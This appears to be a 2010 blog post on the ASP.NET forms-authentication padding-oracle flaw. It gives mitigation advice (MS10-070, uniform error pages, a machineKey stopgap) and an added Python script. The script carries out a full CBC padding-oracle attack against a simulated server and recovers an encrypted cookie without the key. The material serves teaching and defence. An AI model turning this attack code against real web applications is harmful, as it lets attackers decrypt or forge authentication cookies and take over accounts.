Wednesday, September 15, 2010

Hack ASP.NET Forms Authentication in 30 Minutes

A flaw in the way ASP.NET uses its default encryption to protect forms-authentication cookies lets an attacker decrypt them without ever learning the key. The attack is a padding oracle: the attacker submits modified ciphertext to the server, learns from the server's different responses whether the tampered bytes decrypted to valid padding, and repeats this byte by byte until the whole cookie is recovered. Security researchers Thai Duong and Juliano Rizzo claim the process is 100 percent reliable and takes only 30 to 50 minutes using their Padding Oracle Exploit Tool (POET). If you run an ASP.NET website, act immediately to keep it from being attacked. Quoting directly from Visual Studio Magazine, the following change to the web.config file is offered as an immediate fix. Treat it as a stopgap: a padding oracle exploits the server's padding-error leak, not a weakness of a particular cipher, so changing the algorithm alone does not close the oracle. The durable fix is Microsoft's security update for this issue (MS10-070) together with a customErrors setting that returns the same generic error page for every failure.
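To make the attack concrete, here is an added example, not code from the original post or from POET: a complete CBC padding-oracle attack against a simulated server that, like unpatched ASP.NET, answers a padding failure differently from any other outcome. The block cipher is an assumption, a small SHA-256-keyed Feistel network chosen so the script runs on a bare Python install; the cookie contents and the server class are constructed for the demo. The attack code never looks inside the cipher, which is exactly why it works with 8-byte (3DES-sized) and 16-byte (AES-sized) blocks alike.

```python
"""Added example, not from the original post or POET. The block cipher is a stand-in
(SHA-256-keyed Feistel network, assumed so this runs on bare Python); the attack never
looks inside it: swapping AES for 3DES only changes the block size."""
import hashlib
import os
SAMPLE_COOKIE = b"user=alice;role=admin;exp=2010-09-15"  # constructed sample value

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

class FeistelCipher:
    """Toy block cipher standing in for AES (16-byte) or 3DES (8-byte) blocks."""
    def __init__(self, key: bytes, block_size: int):
        self.key, self.bs, self.half = key, block_size, block_size // 2
    def _f(self, rnd: int, half: bytes) -> bytes:
        return hashlib.sha256(self.key + bytes([rnd]) + half).digest()[: self.half]
    def _run(self, block: bytes, rounds) -> bytes:
        left, right = block[: self.half], block[self.half :]
        for rnd in rounds:
            left, right = right, xor(left, self._f(rnd, right))
        return right + left  # final swap makes the same loop its own inverse
    def encrypt_block(self, block: bytes) -> bytes:
        return self._run(block, range(4))
    def decrypt_block(self, block: bytes) -> bytes:
        return self._run(block, reversed(range(4)))

def pkcs7_pad(data: bytes, bs: int) -> bytes:
    n = bs - len(data) % bs
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes, bs: int) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > bs or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(c: FeistelCipher, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), c.bs):
        prev = c.encrypt_block(xor(pt[i : i + c.bs], prev))
        out += prev
    return out

def cbc_decrypt(c: FeistelCipher, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), c.bs):
        out += xor(c.decrypt_block(ct[i : i + c.bs]), prev)
        prev = ct[i : i + c.bs]
    return out

class VulnerableServer:
    """Keeps the key, but like unpatched ASP.NET reports a padding failure
    differently from every other outcome; that yes/no answer is the oracle."""
    def __init__(self, block_size: int):
        self.cipher, self.queries = FeistelCipher(os.urandom(32), block_size), 0
    def issue_cookie(self, plaintext: bytes) -> bytes:
        iv = os.urandom(self.cipher.bs)
        return iv + cbc_encrypt(self.cipher, iv, pkcs7_pad(plaintext, self.cipher.bs))
    def padding_ok(self, cookie: bytes) -> bool:
        self.queries, bs = self.queries + 1, self.cipher.bs
        try:
            pkcs7_unpad(cbc_decrypt(self.cipher, cookie[:bs], cookie[bs:]), bs)
            return True
        except ValueError:
            return False

def padding_oracle_attack(cookie: bytes, bs: int, oracle) -> bytes:
    """Recover the plaintext of iv||ciphertext with the oracle alone, never the key."""
    blocks = [cookie[i : i + bs] for i in range(0, len(cookie), bs)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(bs)  # D_k(target), learned last byte first
        for pos in range(bs - 1, -1, -1):
            pad = bs - pos
            for guess in range(256):
                forged = bytearray(inter[k] ^ pad if k > pos else 0 for k in range(bs))  # known bytes -> pad
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == bs - 1:  # edge case: a decrypted tail ..02 02 also validates;
                    forged[pos - 1] ^= 0xFF  # genuine 01 padding survives this change
                    if not oracle(bytes(forged) + target):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("no byte accepted: the server is not a padding oracle")
        plaintext += xor(bytes(inter), prev)
    return pkcs7_unpad(plaintext, bs)

def demo(block_size: int):
    server = VulnerableServer(block_size)
    cookie = server.issue_cookie(SAMPLE_COOKIE)
    return padding_oracle_attack(cookie, block_size, server.padding_ok), server.queries

if __name__ == "__main__":
    for bs in (16, 8):  # AES-sized and 3DES-sized blocks fall the same way
        print(bs, demo(bs))
```

Running the script recovers the cookie under a fresh random key for both block sizes, using on the order of a hundred oracle queries per plaintext byte. The only thing the attacker needs is that `padding_ok` answers differently for a padding error than for anything else; removing that distinction (one generic error response for every failure, and authenticating the ciphertext so tampered cookies are rejected before decryption) is what closes the hole, not the choice of cipher.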

The encryption method can be set in the web.config file for a site, in IIS 7 for a Web server, or in the config file for .NET on a server in %SYSTEMROOT%\Microsoft.NET\Framework\version\CONFIG\. On 64-bit systems, it must also be set in %SYSTEMROOT%\Microsoft.NET\Framework64\version\CONFIG\. A typical entry would look like this:

<system.web>
  <!-- element and attribute names are case-sensitive in ASP.NET configuration -->
  <!-- AutoGenerate produces a different key on each machine; a web farm needs the same
       explicit validationKey and decryptionKey on every server -->
  <machineKey decryption="3DES" decryptionKey="AutoGenerate,IsolateApps"
              validation="3DES" validationKey="AutoGenerate,IsolateApps" />
</system.web>
On a Web farm, this setting will have to be made on all the servers in the farm.

Reference: Security Hack Exposes Forms Authentication in ASP.NET [Visual Studio Magazine]